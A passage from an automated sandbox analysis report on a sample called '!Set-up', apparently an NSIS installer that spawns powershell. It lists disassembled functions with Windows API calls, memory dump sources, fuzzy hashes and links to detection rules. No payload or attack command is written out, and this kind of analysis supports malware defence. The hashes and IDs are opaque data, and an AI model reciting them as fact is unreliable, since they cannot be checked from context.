                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                              • String ID:
                                                              • API String ID: 1599320355-0
                                                              • Opcode ID: 2ae45dc5b744dabfc446a34129bb4571dfe0fe142ad68b921cc5a8ab1e19b1d4
                                                              • Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
                                                              • Opcode Fuzzy Hash: 2ae45dc5b744dabfc446a34129bb4571dfe0fe142ad68b921cc5a8ab1e19b1d4
                                                              • Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D
                                                              Function 00407224 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                              • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
                                                              • lstrcmpW.KERNEL32(?,Version ), ref: 00407276
                                                              • lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: lstrcpyn$CreateFilelstrcmp
                                                              • String ID: Version
                                                              • API String ID: 512980652-315105994
                                                              • Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                              • Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
                                                              • Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                              • Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1
                                                              Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
                                                              • GetTickCount.KERNEL32 ref: 00403303
                                                              • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                              • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                              • String ID:
                                                              • API String ID: 2102729457-0
                                                              • Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                              • Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
                                                              • Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                              • Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC
                                                              Function 00406391 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
                                                              • GlobalFree.KERNEL32(00000000), ref: 004063CA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                              • String ID:
                                                              • API String ID: 2883127279-0
                                                              • Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                              • Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
                                                              • Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                              • Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674
                                                              Function 004048F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • IsWindowVisible.USER32(?), ref: 0040492E
                                                              • CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
                                                                • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: Window$CallMessageProcSendVisible
                                                              • String ID:
                                                              • API String ID: 3748168415-3916222277
                                                              • Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                              • Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
                                                              • Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                              • Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9
                                                              Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                              • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfileStringlstrcmp
                                                              • String ID: !N~
                                                              • API String ID: 623250636-529124213
                                                              • Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                              • Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
                                                              • Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                              • Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714
                                                              Function 00405C6B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                              • CloseHandle.KERNEL32(?), ref: 00405C9D
                                                              Strings
                                                              • Error launching installer, xrefs: 00405C74
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: CloseCreateHandleProcess
                                                              • String ID: Error launching installer
                                                              • API String ID: 3712363035-66219284
                                                              • Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                              • Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
                                                              • Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                              • Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69
                                                              Function 004062CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                              • wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: CloseHandlelstrlenwvsprintf
                                                              • String ID: RMDir: RemoveDirectory invalid input("")
                                                              • API String ID: 3509786178-2769509956
                                                              • Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                              • Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
                                                              • Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                              • Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E
                                                              Function 00405DE2 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                              • lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
                                                              • CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
                                                              • lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                              • String ID:
                                                              • API String ID: 190613189-0
                                                              • Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                              • Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
                                                              • Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                              • Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4

                                                              Executed Functions

                                                              Function 07631518 Relevance: 5.6, Strings: 4, Instructions: 591COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2788681772.0000000007630000.00000040.00000800.00020000.00000000.sdmp, Offset: 07630000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_7630000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4']q$4']q$4']q$4']q
                                                              • API String ID: 0-1785108022
                                                              • Opcode ID: 11daa405c96f699907a8faa6451ef180a2eedca36d664e3626ec8e603e67f111
                                                              • Instruction ID: 6be75dfc76f76f0005551112e4ae5528f17cc70e38abff3b128400db12a56377
                                                              • Opcode Fuzzy Hash: 11daa405c96f699907a8faa6451ef180a2eedca36d664e3626ec8e603e67f111
                                                              • Instruction Fuzzy Hash: 6A1258B1B0460D8FCB199B7888116AABBE29FC3315F18847AD906DB751DB35CD42C7A2
                                                              Function 04A53FA0 Relevance: .5, Instructions: 506COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2787196058.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_4a50000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: be7a4b973bcf94e468d31ab3271634de141f3a70bda2cc69cc27fa1efa7428c0
                                                              • Instruction ID: ee605e5652da87f98936e86cb4951082e0ff9c30de5b6365760b8801d048e778
                                                              • Opcode Fuzzy Hash: be7a4b973bcf94e468d31ab3271634de141f3a70bda2cc69cc27fa1efa7428c0
                                                              • Instruction Fuzzy Hash: 8A22AC74A006459FCB05CF5CC984AAEBBB1FF49310B25859AD855EB3A6C735FC81CBA0
                                                              Function 076314FC Relevance: .1, Instructions: 125COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2788681772.0000000007630000.00000040.00000800.00020000.00000000.sdmp, Offset: 07630000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_7630000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c858b65e1b575cb7835196b0742adf79d60425116a67075e08a1ccd4e5fa1af1
                                                              • Instruction ID: 4b718d40a054afae1024962688209b6207c161063b5150d9057f99d2d41c1871
                                                              • Opcode Fuzzy Hash: c858b65e1b575cb7835196b0742adf79d60425116a67075e08a1ccd4e5fa1af1
                                                              • Instruction Fuzzy Hash: EB4141F1B046099FCB188F7885416BABBA19F83694F1C80A7D907AF751D735CD41C7A1
                                                              Function 04A53010 Relevance: .1, Instructions: 65COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2787196058.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_4a50000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a0acc263e82e3ededb15862c3aaabd0deb544ff3d3d3605e9dd8c6a0ccadab86
                                                              • Instruction ID: 89b499ba8972bd31eb0c55729aec64e8c34a858847244c007e50ee67d3a2fd81
                                                              • Opcode Fuzzy Hash: a0acc263e82e3ededb15862c3aaabd0deb544ff3d3d3605e9dd8c6a0ccadab86
                                                              • Instruction Fuzzy Hash: 802149B4A052099FCB00CF9DC5809AABBB4FF89300B158596E805EB362C335ED41CBA1
                                                              Function 04A53000 Relevance: .1, Instructions: 58COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2787196058.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_4a50000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 225d1da324f65fe7591ca912a295fc0dd8d5a7e2c1601511b5886c3cfebe7443
                                                              • Instruction ID: 6c8de1ea7a43b9dce4fd3d3859e9de686941f4153505589c722608ca16b5a739
